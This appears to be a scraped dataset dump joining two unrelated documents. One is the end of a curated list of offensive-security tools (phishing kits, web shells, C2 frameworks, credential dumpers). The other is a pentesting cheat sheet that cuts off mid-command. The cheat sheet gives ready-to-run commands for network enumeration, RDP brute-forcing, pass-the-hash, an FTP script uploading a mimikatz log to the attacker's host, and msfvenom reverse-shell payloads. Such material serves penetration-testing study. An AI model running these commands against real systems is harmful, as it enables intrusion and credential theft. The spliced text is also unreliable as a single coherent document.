to find and extrapolate internal company organizational structures.\n* [metagoofil](https://github.com/laramies/metagoofil) - Metadata harvester.\n* [theHarvester](https://github.com/laramies/theHarvester) - E-mail, subdomain and people names harvester.\n\n### Network device discovery tools\n\n* [Censys](https://www.censys.io/) - Collects data on hosts and websites through daily ZMap and ZGrab scans.\n* [Shodan](https://www.shodan.io/) - World's first search engine for Internet-connected devices.\n* [ZoomEye](https://www.zoomeye.org/) - Search engine for cyberspace that lets the user find specific network components.\n\n### OSINT Online Resources\n\n* [CertGraph](https://github.com/lanrat/certgraph) - Crawls a domain's SSL/TLS certificates for its certificate alternative names.\n* [GhostProject](https://ghostproject.fr/) - Searchable database of billions of cleartext passwords, partially visible for free.\n* [NetBootcamp OSINT Tools](http://netbootcamp.org/osinttools/) - Collection of OSINT links and custom Web interfaces to other services.\n* [OSINT Framework](http://osintframework.com/) - Collection of various OSINT tools broken out by category.\n* [WiGLE.net](https://wigle.net/) - Information about wireless networks world-wide, with user-friendly desktop and web applications.\n\n### Source code repository searching tools\n\nSee also *[Web-accessible source code ripping tools](#web-accessible-source-code-ripping-tools)*.\n\n* [vcsmap](https://github.com/melvinsh/vcsmap) - Plugin-based tool to scan public version control systems for sensitive information.\n* [Yar](https://github.com/Furduhlutur/yar) - Clone git repositories to search through the whole commit history in order of commit time for secrets, tokens, or passwords.\n\n### Web application and resource analysis tools\n\n* [BlindElephant](http://blindelephant.sourceforge.net/) - Web application fingerprinter.\n* [EyeWitness](https://github.com/ChrisTruncer/EyeWitness) - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.\n* [VHostScan](https://github.com/codingo/VHostScan) - Virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.\n* [Wappalyzer](https://www.wappalyzer.com/) - Wappalyzer uncovers the technologies used on websites.\n* [WhatWaf](https://github.com/Ekultek/WhatWaf) - Detect and bypass web application firewalls and protection systems.\n* [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Website fingerprinter.\n* [wafw00f](https://github.com/EnableSecurity/wafw00f) - Identifies and fingerprints Web Application Firewall (WAF) products.\n* [webscreenshot](https://github.com/maaaaz/webscreenshot) - Simple script to take screenshots of websites from a list of sites.\n\n## Operating System Distributions\n\n* [Android Tamer](https://androidtamer.com/) - Distribution built for Android security professionals that includes tools required for Android security testing.\n* [ArchStrike](https://archstrike.org/) - Arch GNU/Linux repository for security professionals and enthusiasts.\n* [AttifyOS](https://github.com/adi0x90/attifyos) - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.\n* [BlackArch](https://www.blackarch.org/) - Arch GNU/Linux-based distribution for penetration testers and security researchers.\n* [Buscador](https://inteltechniques.com/buscador/) - GNU/Linux virtual machine that is pre-configured for online investigators.\n* [Kali](https://www.kali.org/) - Rolling Debian-based GNU/Linux distribution designed for penetration testing and digital forensics.\n* [Network Security Toolkit (NST)](http://networksecuritytoolkit.org/) - Fedora-based GNU/Linux bootable live Operating System designed to provide easy access to best-of-breed open source network security applications.\n* [Parrot](https://parrotlinux.org/) - Distribution similar to Kali, with support for multiple hardware architectures.\n* [PentestBox](https://pentestbox.org/) - Open source pre-configured portable penetration testing environment for the Windows Operating System.\n* [The Pentesters Framework](https://github.com/trustedsec/ptf) - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that omits less frequently used utilities.\n\n## Periodicals\n\n* [2600: The Hacker Quarterly](https://www.2600.com/Magazine/DigitalEditions) - American publication about technology and computer \"underground\" culture.\n* [Phrack Magazine](http://www.phrack.org/) - By far the longest running hacker zine.\n\n## Physical Access Tools\n\n* [AT Commands](https://atcommands.org/) - Use AT commands over an Android device's USB port to rewrite device firmware, bypass security mechanisms, exfiltrate sensitive information, perform screen unlocks, and inject touch events.\n* [Bash Bunny](https://www.hak5.org/gear/bash-bunny) - Local exploit delivery tool in the form of a USB thumbdrive in which you write payloads in a DSL called BunnyScript.\n* [LAN Turtle](https://lanturtle.com/) - Covert \"USB Ethernet Adapter\" that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.\n* [PCILeech](https://github.com/ufrisk/pcileech) - Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.\n* [Packet Squirrel](https://www.hak5.org/gear/packet-squirrel) - Ethernet multi-tool designed to enable covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.\n* [Poisontap](https://samy.pl/poisontap/) - Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.\n* [Proxmark3](https://proxmark3.com/) - RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.\n* [Thunderclap](https://thunderclap.io/) - Open source I/O security research platform for auditing physical DMA-enabled hardware peripheral ports.\n* [USB Rubber Ducky](http://usbrubberducky.com/) - Customizable keystroke injection attack platform masquerading as a USB thumbdrive.\n\n## Privilege Escalation Tools\n\n* [Active Directory and Privilege Escalation (ADAPE)](https://github.com/hausec/ADAPE-Script) - Umbrella script that automates numerous useful PowerShell modules to discover security misconfigurations and attempt privilege escalation against Active Directory.\n* [GTFOBins](https://gtfobins.github.io/) - Curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.\n* [LOLBAS (Living Off The Land Binaries and Scripts)](https://lolbas-project.github.io/) - Documents binaries, scripts, and libraries that can be used for \"Living Off The Land\" techniques, i.e., binaries that can be used by an attacker to perform actions beyond their original purpose.\n* [LinEnum](https://github.com/rebootuser/LinEnum) - Scripted local Linux enumeration and privilege escalation checker useful for auditing a host and during CTF gaming.\n* [Postenum](https://github.com/mbahadou/postenum) - Shell script used for enumerating possible privilege escalation opportunities on a local GNU/Linux system.\n* [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) - Shell script to check for simple privilege escalation vectors on UNIX systems.\n\n### Password Spraying Tools\n\n* [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) - Tool written in PowerShell to perform a password spray attack against users of a domain.\n* [SprayingToolkit](https://github.com/byt3bl33d3r/SprayingToolkit) - Scripts to make password spraying attacks against Lync/S4B, Outlook Web Access (OWA) and Office 365 (O365) a lot quicker, less painful and more efficient.\n\n## Reverse Engineering\n\nSee also [awesome-reversing](https://github.com/tylerha97/awesome-reversing), [*Exploit Development Tools*](#exploit-development-tools).\n\n### Reverse Engineering Books\n\n* [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://www.amazon.com/Hacking-Ethical-Hackers-Handbook-Edition/dp/0071832386)\n* [Hacking the Xbox by Andrew Huang, 2003](https://nostarch.com/xbox.htm)\n* [Practical Reverse Engineering by Bruce Dang et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118787315.html)\n* [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/)\n* [The IDA Pro Book by Chris Eagle, 2011](https://nostarch.com/idapro2.htm)\n\n### Reverse Engineering Tools\n\n* [angr](https://angr.io/) - Platform-agnostic binary analysis framework.\n* [Capstone](http://www.capstone-engine.org/) - Lightweight multi-platform, multi-architecture disassembly framework.\n* [Detect It Easy(DiE)](https://github.com/horsicq/Detect-It-Easy) - Program for determining types of files for Windows, Linux and MacOS.\n* [Evan's Debugger](http://www.codef00.com/projects#debugger) - OllyDbg-like debugger for GNU/Linux.\n* [Frida](https://www.frida.re/) - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.\n* [Fridax](https://github.com/NorthwaveNL/fridax) - Read variables and intercept/hook functions in Xamarin/Mono JIT and AOT compiled iOS/Android applications.\n* [Ghidra](https://www.ghidra-sre.org/) - Suite of free software reverse engineering tools developed by NSA's Research Directorate originally exposed in WikiLeaks's \"Vault 7\" publication and now maintained as open source software.\n* [Immunity Debugger](https://immunityinc.com/products/debugger/) - Powerful way to write exploits and analyze malware.\n* [Interactive Disassembler (IDA Pro)](https://www.hex-rays.com/products/ida/) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware.shtml).\n* [Medusa](https://github.com/wisk/medusa) - Open source, cross-platform interactive disassembler.\n* [OllyDbg](http://www.ollydbg.de/) - x86 debugger for Windows binaries that emphasizes binary code analysis.\n* [PyREBox](https://github.com/Cisco-Talos/pyrebox) - Python scriptable Reverse Engineering sandbox by Cisco-Talos.\n* [Radare2](http://rada.re/r/index.html) - Open source, crossplatform reverse engineering framework.\n* [UEFITool](https://github.com/LongSoft/UEFITool) - UEFI firmware image viewer and editor.\n* [Voltron](https://github.com/snare/voltron) - Extensible debugger UI toolkit written in Python.\n* [WDK/WinDbg](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools) - Windows Driver Kit and WinDbg.\n* [binwalk](https://github.com/devttys0/binwalk) - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.\n* [boxxy](https://github.com/kpcyrd/boxxy-rs) - Linkable sandbox explorer.\n* [dnSpy](https://github.com/0xd4d/dnSpy) - Tool to reverse engineer .NET assemblies.\n* [plasma](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.\n* [pwndbg](https://github.com/pwndbg/pwndbg) - GDB plug-in that eases debugging with GDB, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers, and exploit developers.\n* [rVMI](https://github.com/fireeye/rVMI) - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.\n* [x64dbg](http://x64dbg.com/) - Open source x64/x32 debugger for windows.\n\n## Security Education Courses\n\n* [ARIZONA CYBER WARFARE RANGE](http://azcwr.org/) - 24x7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare.\n* [Cybrary](http://cybrary.it) - Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book 'Penetration Testing for Highly Secured Environments'.\n* [European Union Agency for Network and Information Security](https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material) - ENISA Cyber Security Training material.\n* [Offensive Security Training](https://www.offensive-security.com/information-security-training/) - Training from BackTrack/Kali developers.\n* [Open Security Training](http://opensecuritytraining.info/) - Training material for computer security classes.\n* [Roppers Academy Training](https://www.hoppersroppers.org/training.html) - Free courses on computing and security fundamentals designed to train a beginner to crush their first CTF. \n* [SANS Security Training](http://www.sans.org/) - Computer Security Training & Certification.\n\n## Shellcoding Guides and Tutorials\n\n* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits.\n* [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database.\n* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode.\n* [The Shellcoder's Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)\n\n## Side-channel Tools\n\n* [ChipWhisperer](http://chipwhisperer.com) - Complete open-source toolchain for side-channel power analysis and glitching attacks.\n* [SGX-Step](https://github.com/jovanbulck/sgx-step) - Open-source framework to facilitate side-channel attack research on Intel x86 processors in general and Intel SGX (Software Guard Extensions) platforms in particular.\n* [TRRespass](https://github.com/vusec/trrespass) - Many-sided rowhammer tool suite able to reverse engineer the contents of DDR3 and DDR4 memory chips protected by Target Row Refresh mitigations.\n\n## Social Engineering\n\nSee also [awesome-social-engineering](https://github.com/v2-dev/awesome-social-engineering).\n\n### Social Engineering Books\n\n* [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://www.hachettebookgroup.com/titles/kevin-mitnick/ghost-in-the-wires/9780316134477/)\n* [No Tech Hacking by Johnny Long & Jack Wiles, 2008](https://www.elsevier.com/books/no-tech-hacking/mitnick/978-1-59749-215-7)\n* [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](https://www.mhprofessional.com/9780071818469-usa-social-engineering-in-it-security-tools-tactics-and-techniques-group)\n* [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0471237124.html)\n* [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764569597.html)\n* [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118608577.html)\n\n### Social Engineering Online Resources\n\n* [Social Engineering Framework](http://www.social-engineer.org/framework/general-discussion/) - Information resource for social engineers.\n\n### Social Engineering Tools\n\n* [Beelogger](https://github.com/4w4k3/BeeLogger) - Tool for generating keylooger.\n* [Catphish](https://github.com/ring0lab/catphish) - Tool for phishing and corporate espionage written in Ruby.\n* [Evilginx2](https://github.com/kgretzky/evilginx2) - Standalone Machine-in-the-Middle (MitM) reverse proxy attack framework for setting up phishing pages capable of defeating most forms of 2FA security schemes.\n* [FiercePhish](https://github.com/Raikia/FiercePhish) - Full-fledged phishing framework to manage all phishing engagements.\n* [Gophish](https://getgophish.com) - Open-source phishing framework.\n* [King Phisher](https://github.com/securestate/king-phisher) - Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.\n* [Modlishka](https://github.com/drk1wi/Modlishka) - Flexible and powerful reverse proxy with real-time two-factor authentication.\n* [ReelPhish](https://github.com/fireeye/ReelPhish) - Real-time two-factor phishing tool.\n* [Social Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit) - Open source pentesting framework designed for social engineering featuring a number of custom attack vectors to make believable attacks quickly.\n* [SocialFish](https://github.com/UndeadSec/SocialFish) - Social media phishing framework that can run on an Android phone or in a Docker container.\n* [phishery](https://github.com/ryhanson/phishery) - TLS/SSL enabled Basic Auth credential harvester.\n* [wifiphisher](https://github.com/sophron/wifiphisher) - Automated phishing attacks against WiFi networks.\n\n## Static Analyzers\n\n* [Brakeman](https://github.com/presidentbeef/brakeman) - Static analysis security vulnerability scanner for Ruby on Rails applications.\n* [FindBugs](http://findbugs.sourceforge.net/) - Free software static analyzer to look for bugs in Java code.\n* [Progpilot](https://github.com/designsecurity/progpilot) - Static security analysis tool for PHP code.\n* [RegEx-DoS](https://github.com/jagracey/RegEx-DoS) - Analyzes source code for Regular Expressions susceptible to Denial of Service attacks.\n* [bandit](https://pypi.python.org/pypi/bandit/) - Security oriented static analyser for Python code.\n* [cppcheck](http://cppcheck.sourceforge.net/) - Extensible C/C++ static analyzer focused on finding bugs.\n* [sobelow](https://github.com/nccgroup/sobelow) - Security-focused static analysis for the Phoenix Framework.\n* [cwe_checker](https://github.com/fkie-cad/cwe_checker) - Suite of tools built atop the Binary Analysis Platform (BAP) to heuristically detect CWEs in compiled binaries and firmware.\n\n## Steganography Tools\n\n* [Cloakify](https://github.com/TryCatchHCF/Cloakify) - Textual steganography toolkit that converts any filetype into lists of everyday strings.\n* [StegOnline](https://stegonline.georgeom.net/) - Web-based, enhanced, and open-source port of StegSolve.\n* [StegCracker](https://github.com/Paradoxis/StegCracker) - Steganography brute-force utility to uncover hidden data inside files.\n\n## Vulnerability Databases\n\n* [Bugtraq (BID)](http://www.securityfocus.com/bid/) - Software security bug identification database compiled from submissions to the SecurityFocus mailing list and other sources, operated by Symantec, Inc.\n* [CISA Known Vulnerabilities Database (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - Vulnerabilities in various systems already known to America's cyber defense agency, the Cybersecurity and Infrastructure Security Agency, to be actively exploited.\n* [CXSecurity](https://cxsecurity.com/) - Archive of published CVE and Bugtraq software vulnerabilities cross-referenced with a Google dork database for discovering the listed vulnerability.\n* [China National Vulnerability Database (CNNVD)](http://www.cnnvd.org.cn/) - Chinese government-run vulnerability database analoguous to the United States's CVE database hosted by Mitre Corporation.\n* [Common Vulnerabilities and Exposures (CVE)](https://cve.mitre.org/) - Dictionary of common names (i.e., CVE Identifiers) for publicly known security vulnerabilities.\n* [Exploit-DB](https://www.exploit-db.com/) - Non-profit project hosting exploits for software vulnerabilities, provided as a public service by Offensive Security.\n* [Full-Disclosure](http://seclists.org/fulldisclosure/) - Public, vendor-neutral forum for detailed discussion of vulnerabilities, often publishes details before many other sources.\n* [GitHub Advisories](https://github.com/advisories/) - Public vulnerability advisories published by or affecting codebases hosted by GitHub, including open source projects.\n* [HPI-VDB](https://hpi-vdb.de/) - Aggregator of cross-referenced software vulnerabilities offering free-of-charge API access, provided by the Hasso-Plattner Institute, Potsdam.\n* [Inj3ct0r](https://www.0day.today/) - Exploit marketplace and vulnerability information aggregator. ([Onion service](http://mvfjfugdwgc5uwho.onion/).)\n* [Microsoft Security Advisories and Bulletins](https://docs.microsoft.com/en-us/security-updates/) - Archive and announcements of security advisories impacting Microsoft software, published by the Microsoft Security Response Center (MSRC).\n* [Mozilla Foundation Security Advisories](https://www.mozilla.org/security/advisories/) - Archive of security advisories impacting Mozilla software, including the Firefox Web Browser.\n* [National Vulnerability Database (NVD)](https://nvd.nist.gov/) - United States government's National Vulnerability Database provides additional meta-data (CPE, CVSS scoring) of the standard CVE List along with a fine-grained search engine.\n* [Open Source Vulnerabilities (OSV)](https://osv.dev/) - Database of vulnerabilities affecting open source software, queryable by project, Git commit, or version.\n* [Packet Storm](https://packetstormsecurity.com/files/) - Compendium of exploits, advisories, tools, and other security-related resources aggregated from across the industry.\n* [SecuriTeam](http://www.securiteam.com/) - Independent source of software vulnerability information.\n* [Snyk Vulnerability DB](https://snyk.io/vuln/) - Detailed information and remediation guidance for vulnerabilities known by Snyk.\n* [US-CERT Vulnerability Notes Database](https://www.kb.cert.org/vuls/) - Summaries, technical details, remediation information, and lists of vendors affected by software vulnerabilities, aggregated by the United States Computer Emergency Response Team (US-CERT).\n* [VulDB](https://vuldb.com) - Independent vulnerability database with user community, exploit details, and additional meta data (e.g. CPE, CVSS, CWE)\n* [Vulnerability Lab](https://www.vulnerability-lab.com/) - Open forum for security advisories organized by category of exploit target.\n* [Vulners](https://vulners.com/) - Security database of software vulnerabilities.\n* [Vulmon](https://vulmon.com/) - Vulnerability search engine with vulnerability intelligence features that conducts full text searches in its database.\n* [Zero Day Initiative](http://zerodayinitiative.com/advisories/published/) - Bug bounty program with publicly accessible archive of published security advisories, operated by TippingPoint.\n\n## Web Exploitation\n\n* [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.\n* [Offensive Web Testing Framework (OWTF)](https://www.owasp.org/index.php/OWASP_OWTF) - Python-based framework for pentesting Web applications based on the OWASP Testing Guide.\n* [Raccoon](https://github.com/evyatarmeged/Raccoon) - High performance offensive security tool for reconnaissance and vulnerability scanning.\n* [WPSploit](https://github.com/espreto/wpsploit) - Exploit WordPress-powered websites with Metasploit.\n* [autochrome](https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/march/autochrome/) - Chrome browser profile preconfigured with appropriate settings needed for web application testing.\n* [badtouch](https://github.com/kpcyrd/badtouch) - Scriptable network authentication cracker.\n* [gobuster](https://github.com/OJ/gobuster) - Lean multipurpose brute force search/fuzzing tool for Web (and DNS) reconnaissance.\n* [sslstrip2](https://github.com/LeonardoNve/sslstrip2) - SSLStrip version to defeat HSTS.\n* [sslstrip](https://www.thoughtcrime.org/software/sslstrip/) - Demonstration of the HTTPS stripping attacks.\n\n### Intercepting Web proxies\n\nSee also *[Proxies and Machine-in-the-Middle (MITM) Tools](#proxies-and-machine-in-the-middle-mitm-tools)*.\n\n* [Burp Suite](https://portswigger.net/burp/) - Integrated platform for performing security testing of web applications.\n* [Fiddler](https://www.telerik.com/fiddler) - Free cross-platform web debugging proxy with user-friendly companion tools.\n* [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org/) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.\n* [mitmproxy](https://mitmproxy.org/) - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.\n\n### Web file inclusion tools\n\n* [Kadimus](https://github.com/P0cL4bs/Kadimus) - LFI scan and exploit tool.\n* [LFISuite](https://github.com/D35m0nd142/LFISuite) - Automatic LFI scanner and exploiter.\n* [fimap](https://github.com/kurobeats/fimap) - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.\n* [liffy](https://github.com/hvqzao/liffy) - LFI exploitation tool.\n\n### Web injection tools\n\n* [Commix](https://github.com/commixproject/commix) - Automated all-in-one operating system command injection and exploitation tool.\n* [NoSQLmap](https://github.com/codingo/NoSQLMap) - Automatic NoSQL injection and database takeover tool.\n* [SQLmap](http://sqlmap.org/) - Automatic SQL injection and database takeover tool.\n* [tplmap](https://github.com/epinna/tplmap) - Automatic server-side template injection and Web server takeover tool.\n\n### Web path discovery and bruteforcing tools\n\n* [DotDotPwn](https://dotdotpwn.blogspot.com/) - Directory traversal fuzzer.\n* [dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner.\n* [recursebuster](https://github.com/c-sto/recursebuster) - Content discovery tool to perform directory and file bruteforcing.\n\n### Web shells and C2 frameworks\n\n* [Browser Exploitation Framework (BeEF)](https://github.com/beefproject/beef) - Command and control server for delivering exploits to commandeered Web browsers.\n* [DAws](https://github.com/dotcppfile/DAws) - Advanced Web shell.\n* [Merlin](https://github.com/Ne0nd0g/merlin) - Cross-platform post-exploitation HTTP/2 Command and Control server and agent written in Golang.\n* [PhpSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner.\n* [SharPyShell](https://github.com/antonioCoco/SharPyShell) - Tiny and obfuscated ASP.NET webshell for C# web applications.\n* [weevely3](https://github.com/epinna/weevely3) - Weaponized PHP-based web shell.\n\n### Web-accessible source code ripping tools\n\n* [DVCS Ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR.\n* [GitTools](https://github.com/internetwache/GitTools) - Automatically find and download Web-accessible `.git` repositories.\n* [git-dumper](https://github.com/arthaud/git-dumper) - Tool to dump a git repository from a website.\n* [git-scanner](https://github.com/HightechSec/git-scanner) - Tool for bug hunting or pentesting websites that have open `.git` repositories available in public.\n\n### Web Exploitation Books\n\n* [The Browser Hacker's Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)\n* [The Web Application Hacker's Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)\n\n## Windows Utilities\n\n* [Bloodhound](https://github.com/adaptivethreat/Bloodhound/wiki) - Graphical Active Directory trust relationship explorer.\n* [Commando VM](https://github.com/fireeye/commando-vm) - Automated installation of over 140 Windows software packages for penetration testing and red teaming.\n* [Covenant](https://github.com/cobbr/Covenant) - ASP.NET Core application that serves as a collaborative command and control platform for red teamers.\n* [ctftool](https://github.com/taviso/ctftool) - Interactive Collaborative Translation Framework (CTF) exploration tool capable of launching cross-session edit session attacks.\n* [DeathStar](https://github.com/byt3bl33d3r/DeathStar) - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.\n* [Empire](https://www.powershellempire.com/) - Pure PowerShell post-exploitation agent.\n* [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel.\n* [Inveigh](https://github.com/Kevin-Robertson/Inveigh) - Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/machine-in-the-middle tool.\n* [LaZagne](https://github.com/AlessandroZ/LaZagne) - Credentials recovery project.\n* [MailSniper](https://github.com/dafthack/MailSniper) - Modular tool for searching through email in a Microsoft Exchange environment, gathering the Global Address List from Outlook Web Access (OWA) and Exchange Web Services (EWS), and more.\n* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - PowerShell Post-Exploitation Framework.\n* [RID_ENUM](https://github.com/trustedsec/ridenum) - Python script that can enumerate all users from a Windows Domain Controller and crack those user's passwords using brute-force.\n* [Responder](https://github.com/SpiderLabs/Responder) - Link-Local Multicast Name Resolution (LLMNR), NBT-NS, and mDNS poisoner.\n* [Rubeus](https://github.com/GhostPack/Rubeus) - Toolset for raw Kerberos interaction and abuses.\n* [Ruler](https://github.com/sensepost/ruler) - Abuses client-side Outlook features to gain a remote shell on a Microsoft Exchange server.\n* [SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt) - Retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.\n* [Sysinternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) - The Sysinternals Troubleshooting Utilities.\n* [Windows Credentials Editor](https://www.ampliasecurity.com/research/windows-credentials-editor/) - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.\n* [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - Detects potential missing patches on the target.\n* [mimikatz](http://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows operating system.\n* [redsnarf](https://github.com/nccgroup/redsnarf) - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.\n* [wePWNise](https://labs.mwrinfosecurity.com/tools/wepwnise/) - Generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software.\n* [WinPwn](https://github.com/SecureThisShit/WinPwn) - Internal penetration test script to perform local and domain reconnaissance, privilege escalation and exploitation.\n\n## License\n\n[![CC-BY](https://mirrors.creativecommons.org/presskit/buttons/88x31/svg/by.svg)](https://creativecommons.org/licenses/by/4.0/)\n\nThis work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).\n"}}},{"rowIdx":535,"cells":{"text":{"kind":"string","value":"# Peter's Pentesting Cheat Sheet\n\nThe tools used here are available in Kali Linux.\n\n## nmap\n\nTCP network scan, top 100 ports\n```\nnmap -nv -sT --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24\n```\n\nTCP network scan, top 100 ports with OS discovery\n```\nnmap -nv -sTV -O --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24\n```\n\nTCP host scan, all ports with OS discovery\n```\nnmap -Pn -sT -O -p- -oA nmap-tcp-all 192.168.0.20\n```\n\n## NETBIOS\n\nNBT name scan\n```\nnbtscan 192.168.0.20\nnbtscan 192.168.0.0/24\n```\n\n## SNMP\n\nSNMP scan\n```\nnmap –sU –p161,162 10.11.1.0/24 -oA nmap-snmp-scan\nonesixtyone 192.168.0.20\nonesixtyone -i snmp-hosts.txt -c /usr/share/doc/onesixtyone/dict.txt\n\nsnmpenum 192.168.0.20 public windows.txt \n```\n\n## FTP\n\nCheck anonymous access\n```\nnmap -p21 --script=ftp-anon 192.168.0.20\n```\n\nStart a local FTP server on port 21 with anonymous access to files in the current directory\n```\nsudo apt install python3-pyftpdlib\nsudo python3 -m pyftpdlib -w -p 21\n```\n\nFTP script for the Windows command line to download further tools\n```\necho open 192.168.0.20 > ftpscript.txt\necho USER anonymous >> ftpscript.txt\necho anonymous >> ftpscript.txt\necho binary >> ftpscript.txt\necho get PsExec.exe >> ftpscript.txt\necho bye >> ftpscript.txt\nftp -v -n -s:ftpscript.txt\n```\n\nFTP script to upload data to your host\n```\necho open 192.168.0.20 > ftpscript.txt\necho USER anonymous >> ftpscript.txt\necho anonymous >> ftpscript.txt\necho put mimikatz.log >> ftpscript.txt\necho bye >> ftpscript.txt\nftp -v -n -s:ftpscript.txt\n```\n\n## HTTP(S)\n\nNikto scan\n```\nnikto -host 192.168.0.20\nnikto -ssl -host 192.168.0.20:443\n```\n\nDirectories scan\n```\ndirb http://192.168.0.20/ /usr/share/wordlists/dirb/big.txt\ngobuster dir -u http://192.168.0.20/ -w /usr/share/wordlists/dirb/big.txt\n```\n\nStart a HTTP server on port 80, serving files from the current directory\n```\nsudo python -m SimpleHTTPServer 80\n```\n\n## SMB\n\nScan for some known vulnerabilities\n```\nnmap -p139,445 --script smb-vuln-* 192.168.0.20\n```\n\nList available shares without providing any user credentials\n```\nsmbclient -L //192.168.0.20 -N\n```\n\nList shares which are available for user Peter\n```\nsmbclient -L //192.168.0.20 -U 'Peter'\n```\n\nConnect to share wwwroot\n```\nsmbclient //192.168.0.20/wwwroot -N\nsmbclient //192.168.0.20/wwwroot -U 'Peter'\n```\n\n## MSSQL\n\nDatabase info\n```\nnmap -nv -Pn -p27900 --script=ms-sql-info --script-args mssql.username=user,mssql.password=password,mssql.instance-name=mydb 192.168.0.20\n```\n\nConnect to the DB\n```\nsqsh -S 192.168.0.20 -U username -P password\nmssqlclient.py user:password@192.168.0.20 -db mydb -port 27900\n```\n\n## RDP\n\nConnect to a host using xfreerdp\n```\nxfreerdp /u:mydomain\\\\peter /p:password /v:192.168.0.20\n```\n\nShare a local folder with the remote host\n```\nrdesktop -u peter -p password -r disk:shared=/home/kali/shared 192.168.0.20\n```\n\nPass the hash using xfreerdp\n```\nxfreerdp /u:domain\\\\user /pth:HASH /v:192.168.0.20\n```\n\nBruteforce RDP credentials\n```\ncrowbar -b rdp -s 192.168.0.20/32 -U usernames_file -C passwords_file\n```\n\n## VNC\n\nCheck for RealVNC 4.1.0 - 4.1.1 Authentication Bypass\n```\n# nmap -p5800,5900 --script realvnc-auth-bypass 192.168.0.20\n```\n\n## Metasploit\n\nCreating WAR file exploit with reverse shell\n```\nmsfvenom -p java/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war\n```\n\nCreating ASP file exploit with reverse shell\n```\nmsfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f asp > reverse.asp\n```\n\nGenerating JavaScript code to open a reverse shell\n```\nmsfvenom -p linux/x86/shell/reverse_tcp 